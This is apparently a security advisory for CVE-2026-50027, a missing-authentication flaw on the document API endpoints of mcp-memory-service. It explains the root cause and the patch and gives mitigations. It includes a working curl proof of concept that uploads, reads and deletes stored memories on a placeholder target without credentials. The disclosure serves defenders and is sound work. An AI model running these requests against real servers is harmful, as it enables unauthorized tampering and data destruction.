CVE-2026-50027: mcp-memory-service Missing Authentication on Document API Endpoints
All seven file/document endpoints in mcp-memory-service accepted requests without any credentials, letting anyone on the network read, write, or delete stored AI memories even when API-key or OAuth au
The problem
The FastAPI router in `documents.py` was instantiated as `router = APIRouter()` with no `dependencies=` argument, and the file never imported `Depends`. This meant every route under `/api/documents/*` (upload, batch-upload, status, history, remove, remove-by-tags, search-content) ran with no authentication check at all.
The sibling `memories.py` router correctly used `Depends(require_write_access)` on equivalent routes, so the authentication infrastructure existed and worked. The omission in `documents.py` created an inconsistent boundary that bypassed the entire auth layer. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Proof of concept
A working proof-of-concept for CVE-2026-50027 in mcp-memory-service, with the exact payload below.
# Step 1: confirm auth IS enforced on /api/memories (expect 401)
curl -i http://TARGET:8000/api/memories
# HTTP/1.1 401 Unauthorized
# Step 2: write arbitrary content into the memory store -- no credentials
printf 'attacker-controlled content' > /tmp/poc.txt
UPLOAD_ID=$(
curl -s -X POST http://TARGET:8000/api/documents/upload \
-F "file=@/tmp/poc.txt" -F "tags=poc-tag" |
python3 -c 'import sys,json; print(json.load(sys.stdin)["upload_id"])'
)
# HTTP/1.1 200 OK {"upload_id": "<uuid>"}
# Step 3: read stored document content -- no credentials
curl -s "http://TARGET:8000/api/documents/search-content/$UPLOAD_ID"
# HTTP/1.1 200 OK (returns full document content)
# Step 4: delete all memories matching a tag -- no credentials
curl -i -X DELETE "http://TARGET:8000/api/documents/remove-by-tags" \
-H "Content-Type: application/json" \
-d '["poc-tag"]'
# HTTP/1.1 200 OK {"memories_deleted": 1}The root cause is CWE-306 (Missing Authentication for Critical Function). `documents.py` never imported `Depends` from FastAPI and instantiated its router without a `dependencies=` parameter, so FastAPI had no hook to invoke any auth middleware on any of the seven routes.
Patch commit 907bac72 (shipped in 10.67.1) added `Depends(require_write_access)` as a parameter to write routes (upload, batch-upload, remove, remove-by-tags) and `Depends(require_read_access)` to read routes (status, history, search-content). Because FastAPI resolves dependency injection at route registration time, adding the `Depends(...)` argument to each function signature is sufficient to enforce the existing auth logic that was already protecting `memories.py`.
The fix
Upgrade to mcp-memory-service 10.67.1 or later. The patch (commit 907bac72) adds `Depends(require_write_access)` or `Depends(require_read_access)` to every function signature in `documents.py`, bringing all seven `/api/documents/*` endpoints under the same authentication enforcement already present on `/api/memories/*`.
If you cannot upgrade immediately, remove network exposure of the HTTP server (bind to 127.0.0.1 only, or place behind an authenticating reverse proxy) until you can apply the patch.
Related research
- high · 8.1CVE-2026-49291CVE-2026-49291: mcp-memory-service Missing Authorization on MCP tools/call
- critical · 10CVE-2026-49257CVE-2026-49257: mcp-pinot-server Unauthenticated Remote Tool Invocation
- critical · 9.8motionEye LFI to Unauthenticated RCE Chain (CVSS 9.8)
- high · 7.8CVE-2022-43467CVE-2022-43467: Open Babel PQS Parser Out-of-Bounds Write